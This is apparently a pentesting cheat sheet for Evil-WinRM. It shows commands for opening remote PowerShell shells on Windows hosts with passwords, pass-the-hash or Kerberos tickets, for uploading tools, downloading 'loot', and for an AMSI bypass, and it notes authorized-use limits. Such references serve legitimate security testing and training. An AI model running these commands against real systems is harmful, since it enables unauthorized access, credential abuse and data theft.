Evil-WinRM Cheat Sheet
WinRM shell and file transfer for post-exploitation on Windows hosts.
Overview
Evil-WinRM gives you an interactive PowerShell session over WinRM (WS-Management: HTTP on TCP 5985, HTTPS on TCP 5986) on a Windows target when you already hold valid credentials, an NT hash, a Kerberos ticket or a client certificate. It is the usual next step once nxc/crackmapexec reports WinRM access; the account has to be in the target's local Administrators or Remote Management Users group for the listener to accept it. Ethics: remote shells alter systems and leave logs; authorized pentest and lab use only.
Install
From the Kali/Debian package:

```bash
sudo apt install evil-winrm
```

or as a Ruby gem:

```bash
gem install evil-winrm
evil-winrm -h
```

Essential commands

```bash
evil-winrm -i 10.10.10.10 -u administrator -p 'Password1!'
evil-winrm -i 10.10.10.10 -u admin -H 31d6cfe0d16ae931b73c59d7e0c089c0
evil-winrm -i host.corp.local -u user@corp.local -p pass -P 5986 -S
```

Common workflows
Password auth:

```bash
evil-winrm -i 10.10.10.10 -u administrator -p 'Password1!'
```

Pass-the-hash (NT hash only; if secretsdump gave you an LM:NT pair, pass just the part after the colon):

```bash
evil-winrm -i 10.10.10.10 -u administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0
```

Inside the shell (upload takes local path then remote path, download takes remote path then local path):

```
*Evil-WinRM* PS> upload /tmp/SharpHound.exe C:\Users\Public\SharpHound.exe
*Evil-WinRM* PS> download C:\Users\Public\loot.zip /tmp/loot.zip
```

Run PowerShell scripts: `-s` points at a local directory; inside the shell, type a script's file name (tab completion works) to load it into the session, then call its functions. `menu` lists the loaded functions and the built-in commands.

```bash
evil-winrm -i 10.10.10.10 -u admin -p pass -s /opt/scripts
```

SSL / alternate port: `-P` is the port flag and `-S` switches the transport to HTTPS (`-c` is not a port; it takes a public-key path for certificate auth).

```bash
evil-winrm -i 10.10.10.10 -u admin -p pass -P 5986 -S
evil-winrm -i 10.10.10.10 -u admin -p pass -P 5985
```

Kerberos (with ticket): point `KRB5CCNAME` at the ccache, give `-i` the FQDN the HTTP SPN is registered for, and pass the realm with `-r` (realm names are case-sensitive and conventionally uppercase; the realm also needs a `kdc` entry in /etc/krb5.conf). No `-u`/`-p` is needed.

```bash
export KRB5CCNAME=/tmp/user.ccache
evil-winrm -i dc01.corp.local -r CORP.LOCAL
```

Flags reference
| Flag | Meaning |
|---|---|
| -i | Target IP or hostname (FQDN for Kerberos) |
| -u / -p | User / password |
| -H | NT hash (pass-the-hash) |
| -P | Port (default 5985) |
| -S | Use SSL/TLS (WinRM HTTPS listener, normally 5986) |
| -s | Local directory of PowerShell scripts to load in-session |
| -e | Local directory of C# executables (run in-session with Invoke-Binary) |
| -r | Kerberos realm (must also appear in /etc/krb5.conf) |
| -c / -k | Public / private key for certificate auth |
| -l | Log the session to a local file |
Tips
- Ethics: WinRM sessions are logged on the target (Microsoft-Windows-WinRM/Operational, a Security 4624 network logon of type 3, and PowerShell 4104 script-block events if that logging is enabled); use engagement-specific accounts where possible.
- Requires WinRM enabled, TCP 5985/5986 reachable through the firewall, and an account in the local Administrators or Remote Management Users group; `nxc winrm <target> -u <user> -p <pass>` confirms command execution before you open a shell.
- AMSI may block some scripts. Evil-WinRM ships a built-in `Bypass-4MSI` command; use it, or any other bypass, only where the engagement scope permits.
- Prefer impacket-wmiexec, impacket-smbexec or impacket-psexec when WinRM is disabled.